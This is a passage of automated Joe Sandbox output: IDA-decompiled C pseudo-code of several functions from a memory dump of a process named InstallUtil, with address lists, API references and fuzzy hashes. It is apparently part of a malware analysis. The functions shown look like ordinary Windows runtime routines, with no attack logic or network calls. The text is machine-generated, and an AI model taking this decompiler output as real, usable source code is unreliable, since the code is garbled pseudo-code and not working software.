					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0131D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0130D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0130F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E0131DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0130B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0130B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0130E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0130A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x012cb171
0x012cb171
0x012cb171
0x012cb171
0x012cb171
0x012cb176
0x012cb17b
0x012cb180
0x012cb186
0x012cb18f
0x012cb198
0x012cb1a4
0x012cb1aa
0x01324802
0x01324802
0x01324805
0x0132480c
0x0132480e
0x012cb1d1
0x012cb1d3
0x012cb1de
0x012cb1de
0x01324817
0x0132481e
0x01324820
0x01324822
0x01324822
0x01324824
0x01324824
0x0132482a
0x00000000
0x00000000
0x01324835
0x0132483a
0x0132483d
0x0132483f
0x01324842
0x01324842
0x01324842
0x01324846
0x0132484c
0x0132484e
0x01324851
0x01324851
0x01324853
0x01324854
0x01324854
0x01324858
0x0132485a
0x0132485a
0x0132485d
0x0132485f
0x01324861
0x01324861
0x01324866
0x0132486b
0x0132486e
0x01324871
0x01324876
0x01324876
0x01324878
0x0132487b
0x01324884
0x01324884
0x00000000
0x0132487d
0x0132487d
0x01324882
0x01324889
0x01324889
0x0132488f
0x01324891
0x013248e0
0x013248e2
0x013248e4
0x013248e4
0x013248e7
0x013248e7
0x013248ed
0x013248f4
0x013248f6
0x01324951
0x01324951
0x01324953
0x01324953
0x01324956
0x01324956
0x01324958
0x01324959
0x01324959
0x0132495d
0x0132495d
0x0132495f
0x0132495f
0x01324965
0x01324969
0x013249ba
0x013249ba
0x013249c1
0x013249c5
0x013249cc
0x013249d4
0x013249d7
0x013249da
0x013249e4
0x013249e5
0x013249f3
0x01324a02
0x00000000
0x01324a02
0x01324972
0x01324974
0x00000000
0x00000000
0x01324976
0x01324979
0x01324982
0x01324983
0x01324984
0x0132498b
0x0132498d
0x01324991
0x01324993
0x01324999
0x0132499d
0x013249a2
0x013249a2
0x013249a2
0x01324999
0x013249ac
0x00000000
0x013249b3
0x013248f8
0x013248fe
0x00000000
0x00000000
0x00000000
0x013248fe
0x01324895
0x0132489c
0x013248ad
0x013248b2
0x013248b5
0x013248b7
0x013248ba
0x013248bc
0x013248c6
0x013248c6
0x013248cb
0x013248d1
0x013248d4
0x013248d8
0x013248d8
0x00000000
0x013248d8
0x013248be
0x013248c0
0x00000000
0x00000000
0x013248c2
0x00000000
0x00000000
0x00000000
0x013248c4
0x00000000
0x01324882
0x0132487b
0x01324904
0x01324906
0x00000000
0x00000000
0x01324908
0x0132490e
0x00000000
0x00000000
0x01324910
0x01324917
0x01324917
0x00000000
0x01324917
0x012cb1ba
0x013247f9
0x013247fc
0x00000000
0x00000000
0x00000000
0x013247fc
0x012cb1c0
0x012cb1c0
0x012cb1c3
0x012cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 013248AD

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 1104533c29dff7a59aa7742328d8eaac57ab002309f6a99db110a7020049fddb
Instruction ID: d9aa9a896df3bc0f9f84475bc009d63403072c9a076f19b440f6e4cba6ec5147
Opcode Fuzzy Hash: 1104533c29dff7a59aa7742328d8eaac57ab002309f6a99db110a7020049fddb
Instruction Fuzzy Hash: 7B51F371E102698EDB36EF68C845BBEBFF0AF01718F1041ADD959AB282D7B14941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012EB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x13bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E012E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01398CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01309E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0130B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0130CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E012E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01398F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0130AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x13b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x13b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x13b8628; // 0x0
							_t116 =  *0x13b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x012eb94c
0x012eb956
0x012eb95c
0x012eb95e
0x012eb964
0x012eb969
0x012eb96d
0x012eb96d
0x012eb970
0x012eb974
0x012eb97a
0x012ebadf
0x012ebadf
0x012ebae2
0x012ebae4
0x012ebae6
0x012ebaf0
0x01332cb8
0x012ebaf6
0x012ebaf6
0x012ebaf6
0x012ebafd
0x012ebb1f
0x012ebb1f
0x012ebaff
0x012ebb00
0x012ebb00
0x012ebb03
0x012ebb03
0x012ebacb
0x012ebacf
0x012ebad0
0x012ebad1
0x012ebadc
0x012ebadc
0x012eb980
0x012eb980
0x012eb988
0x012eb98b
0x012eb98d
0x012eb990
0x012eb993
0x012eb999
0x012eb99b
0x012eb9a1
0x012eb9a5
0x012eb9aa
0x012eb9b0
0x012eb9bb
0x012eb9c0
0x012eb9c3
0x012eb9ca
0x012eb9cc
0x012eb9cf
0x012eb9d3
0x012eb9d7
0x012eba94
0x012eba94
0x012eba98
0x012ebaa3
0x01332ccb
0x012ebaa9
0x012ebaa9
0x012ebaa9
0x012ebab1
0x01332cd5
0x01332cdd
0x01332cdd
0x012ebabb
0x012ebabc
0x012ebac2
0x012ebac3
0x012ebac3
0x012ebac6
0x00000000
0x012eb9dd
0x012eb9dd
0x012eb9e7
0x012eb9e7
0x012eb9ec
0x012eb9ec
0x012eb9f1
0x012eb9f5
0x012eb9fa
0x012eba00
0x012eba0c
0x012eba10
0x012eba10
0x012eba12
0x012eba18
0x00000000
0x00000000
0x012ebb26
0x012ebb26
0x012eba1e
0x012eba1e
0x012eba23
0x012eba25
0x012eba2c
0x012eba30
0x012eba35
0x012eba35
0x012eba41
0x012eba46
0x012eba4c
0x012eba50
0x012eba54
0x012eba6a
0x012eba6e
0x012eba70
0x012eba74
0x012eba78
0x012eba7a
0x012eba7c
0x012eba8e
0x012eba90
0x012eba92
0x012ebb14
0x012ebb14
0x012ebb16
0x012ebb16
0x00000000
0x012eba7c
0x012ebb0a
0x012ebb0d
0x00000000
0x00000000
0x00000000
0x012ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012EB9A5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 3e10875ffae5b50b9ac962f9e799d1dc72e304fdc0de074272fa0ee5e8137412
Instruction ID: f68a8321058d559eb4c4005466a505af6c95468f5e3cf4c833db6b574fd7193c
Opcode Fuzzy Hash: 3e10875ffae5b50b9ac962f9e799d1dc72e304fdc0de074272fa0ee5e8137412
Instruction Fuzzy Hash: 31516A71A28341CFCB21CF2DC0C492ABBE9FB88614F54496EEA8587355E770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01373D40 Relevance: 1.6, APIs: 1, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01373D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x13bd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E012E2280(_t34, 0x13b8a6c);
				_t64 =  *0x13b5768; // 0x77575768
				if(_t64 != 0x13b5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77575770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E012DFFB0(_t53, _t64, 0x13b8a6c);
						 *0x13bb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E012E2280(_t45, 0x13b8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x13b5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E012DFFB0(_t51, _t64, 0x13b8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0130B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x01373d40
0x01373d48
0x01373d52
0x01373d59
0x01373d5d
0x01373d61
0x01373d63
0x01373d67
0x01373d69
0x01373d72
0x01373d76
0x01373d7a
0x01373d7f
0x01373d8b
0x01373d91
0x01373d91
0x01373d91
0x01373d94
0x01373d96
0x01373d9d
0x01373da1
0x01373db0
0x01373dba
0x01373dbc
0x01373dbc
0x01373dc6
0x01373dcb
0x01373dcf
0x01373dd1
0x01373dd4
0x00000000
0x00000000
0x01373dd9
0x01373e0c
0x01373e0c
0x01373e0f
0x01373ddb
0x01373ddb
0x01373de0
0x00000000
0x01373de2
0x01373de2
0x01373de4
0x01373de8
0x01373deb
0x01373df1
0x00000000
0x01373df3
0x01373df3
0x01373df5
0x01373df8
0x01373dfa
0x00000000
0x01373dfa
0x01373df1
0x01373de0
0x01373e11
0x01373e11
0x00000000
0x01373dfe
0x01373e04
0x01373e06
0x00000000
0x01373e06
0x00000000
0x01373e04
0x01373d91
0x01373e15
0x01373e1a
0x01373e1f
0x01373e1f
0x01373e23
0x01373e29
0x00000000
0x00000000
0x01373e2e
0x00000000
0x01373e30
0x01373e30
0x01373e35
0x00000000
0x01373e37
0x01373e3e
0x01373e42
0x01373e48
0x01373e4e
0x00000000
0x01373e4e
0x01373e35
0x00000000
0x01373e2e
0x01373e5b
0x01373e5c
0x01373e5d
0x01373e68
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01373DB0

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5039844f0f7f8a2af340b89869606a228c2b68f4befe4ccf49c0280b18f5274f
Instruction ID: b4eaa60220f3e76e17e12f271ee0baf099910ed11732f6726642916dad92b9bb
Opcode Fuzzy Hash: 5039844f0f7f8a2af340b89869606a228c2b68f4befe4ccf49c0280b18f5274f
Instruction Fuzzy Hash: 5D318B72609306CFC724DF18D58086ABBE5FF85708F4449AEE5899BA41E734DD04CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01304A2C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01304A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x13bd360 ^ _t62;
				_v8 =  *0x13bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E012E2280(_t26, 0x13b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E012DFFB0(_t41, _t51, 0x13b8608);
						L2:
						 *0x13bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0130B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E012E2280(_t28, 0x13b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E012DFFB0(_t42, _t53, 0x13b8608);
							if(_t53 != 0) {
								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E012DFFB0(_t41, _t51, 0x13b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01304a2c
0x01304a34
0x01304a3c
0x01304a3e
0x01304a48
0x01304a4b
0x01304a4d
0x01304a51
0x01304a9c
0x00000000
0x00000000
0x01304aa3
0x01304aa8
0x01304aad
0x01304ab1
0x01304ade
0x01304ae3
0x01304a5a
0x01304a62
0x01304a6a
0x01304a6e
0x0133f203
0x01304a84
0x01304a88
0x01304a89
0x01304a8a
0x01304a95
0x01304a95
0x01304a79
0x01304a80
0x01304af2
0x01304af4
0x01304af9
0x01304aff
0x01304b01
0x01304b03
0x01304b08
0x0133f20a
0x0133f212
0x0133f216
0x0133f216
0x01304b08
0x01304b13
0x01304b1a
0x0133f229
0x0133f229
0x01304b1a
0x01304a82
0x00000000
0x01304a82
0x01304ab7
0x01304acd
0x01304acd
0x01304ad5
0x01304ada
0x00000000
0x01304ada
0x01304ac2
0x01304acb
0x00000000
0x00000000
0x00000000
0x01304acb
0x01304a53
0x01304a53
0x01304a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01304A62

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 438b4fceb72a71a5f68d5d0428db0008e81618e1509b927ed9556c388ef0c1fc
Instruction ID: c1c5f9db29e1c757fd3429b4838782595bc9ad384f15b89afc892f090b429265
Opcode Fuzzy Hash: 438b4fceb72a71a5f68d5d0428db0008e81618e1509b927ed9556c388ef0c1fc
Instruction Fuzzy Hash: EB314432205305DFE7229F18C984B2ABBE8FFC0718F44046DEB564BA81D770DA40CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 012E0050 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E012E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x13bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E012F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0130B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01398A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E012F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x13bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x012e0055
0x012e005d
0x012e0062
0x012e006c
0x012e006f
0x012e0074
0x012e007a
